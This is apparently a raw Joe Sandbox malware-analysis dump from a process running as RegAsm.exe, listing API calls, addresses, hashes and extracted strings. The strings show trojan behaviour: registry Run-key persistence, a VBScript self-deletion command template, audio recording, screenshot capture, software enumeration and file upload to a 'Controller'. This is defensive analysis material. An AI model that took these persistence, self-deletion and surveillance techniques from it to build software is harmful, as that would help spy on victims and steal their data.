                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                        • API String ID: 3797177996-2557013105
                                                        • Opcode ID: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                        • Opcode Fuzzy Hash: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                        • lstrcatW.KERNEL32 ref: 00412601
                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                        • API String ID: 2649220323-436679193
                                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                        • SetEvent.KERNEL32 ref: 0041B219
                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                        • API String ID: 738084811-2094122233
                                                        • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                        • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Write$Create
                                                        • String ID: RIFF$WAVE$data$fmt
                                                        • API String ID: 1602526932-4212202414
                                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                        • API String ID: 1646373207-351152038
                                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                        • CopyFileW.KERNEL32 ref: 0040CED0
                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                        • CopyFileW.KERNEL32 ref: 0040CF84
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                        • CloseHandle.KERNEL32 ref: 0040D02D
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                        • String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
                                                        • API String ID: 1579085052-545640883
                                                        • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                        • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                        • _wcslen.LIBCMT ref: 0041C13B
                                                        • FindVolumeClose.KERNEL32 ref: 0041C15B
                                                        • GetLastError.KERNEL32 ref: 0041C173
                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                        • lstrcatW.KERNEL32 ref: 0041C1B9
                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                        • String ID: ?
                                                        • API String ID: 3941738427-1684325040
                                                        • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                        • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                        • API String ID: 1223786279-2576077980
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable
                                                        • String ID:
                                                        • API String ID: 1464849758-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                        • API String ID: 1332880857-3714951968
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                        • String ID: Close
                                                        • API String ID: 1657328048-3535843008
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                        • API String ID: 3086580692-2582957567
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                        • _free.LIBCMT ref: 004512FF
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00451321
                                                        • _free.LIBCMT ref: 00451336
                                                        • _free.LIBCMT ref: 00451341
                                                        • _free.LIBCMT ref: 00451363
                                                        • _free.LIBCMT ref: 00451376
                                                        • _free.LIBCMT ref: 00451384
                                                        • _free.LIBCMT ref: 0045138F
                                                        • _free.LIBCMT ref: 004513C7
                                                        • _free.LIBCMT ref: 004513CE
                                                        • _free.LIBCMT ref: 004513EB
                                                        • _free.LIBCMT ref: 00451403
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                        • API String ID: 489098229-1431523004
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                        • API String ID: 1913171305-3159800282
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                        • String ID:
                                                        • API String ID: 3658366068-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                        • GetFileType.KERNEL32 ref: 00455D02
                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                        • __dosmaperr.LIBCMT ref: 00455D15
